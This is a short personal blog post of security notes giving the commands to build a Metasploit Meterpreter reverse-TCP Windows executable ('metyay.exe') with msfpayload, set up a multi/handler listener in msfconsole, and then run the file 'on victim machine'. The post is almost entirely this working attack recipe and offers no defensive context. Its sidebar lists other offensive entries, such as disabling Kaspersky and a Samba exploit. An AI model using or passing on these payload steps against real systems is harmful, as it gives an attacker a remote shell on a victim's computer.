skip to main
|
skip to sidebar
IT Bin
Thursday, April 22, 2010
Metasploit Meterpreter Windows Executable Payload
Creating the payload executable:
./msfpayload windows/meterpreter/reverse_tcp LHOST=[localhost_ip] LPORT=[local_port] X > metyay.exe
$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > LHOST [localhost_ip]
msf > exploit
Run metyay.exe on victim machine.
No comments:
Post a Comment
Newer Post
Home
Subscribe to:
Post Comments (Atom)
Dean Liu
Linkedin Profile
Mainly a collection of helpful articles (and rough/hastily pasted solutions) that I come upon while researching, so that I may reference them later.
Blog Archive
►
2019
(1)
►
June
(1)
►
2017
(1)
►
February
(1)
►
2015
(10)
►
November
(1)
►
October
(1)
►
July
(7)
►
June
(1)
►
2014
(13)
►
September
(1)
►
July
(3)
►
June
(1)
►
May
(1)
►
April
(2)
►
February
(2)
►
January
(3)
►
2013
(17)
►
November
(1)
►
October
(3)
►
September
(1)
►
August
(2)
►
July
(2)
►
June
(2)
►
April
(3)
►
February
(1)
►
January
(2)
►
2012
(25)
►
December
(3)
►
November
(2)
►
October
(3)
►
September
(12)
►
August
(1)
►
June
(2)
►
March
(1)
►
February
(1)
►
2011
(24)
►
December
(2)
►
November
(2)
►
September
(1)
►
August
(2)
►
July
(2)
►
June
(1)
►
May
(4)
►
April
(3)
►
March
(3)
►
February
(2)
►
January
(2)
▼
2010
(60)
►
December
(7)
►
November
(6)
►
October
(7)
►
September
(2)
►
August
(6)
►
July
(2)
►
June
(9)
►
May
(11)
▼
April
(10)
Use OS X Airport for wireless sniffing
Disabling Kaspersky via CatchMe.exe
Samba 2.2.x Exploit
THC-Hydra HTTP-POST-FORM bug
Symantec SIM - High Availibility - Restoring Incid...
SSH Tunneling
Symantec Security Information Manager (SSIM) LDAP ...
SNMP Set Example command
Metasploit Meterpreter Evil ASP
Metasploit Meterpreter Windows Executable Payload
No comments:
Post a Comment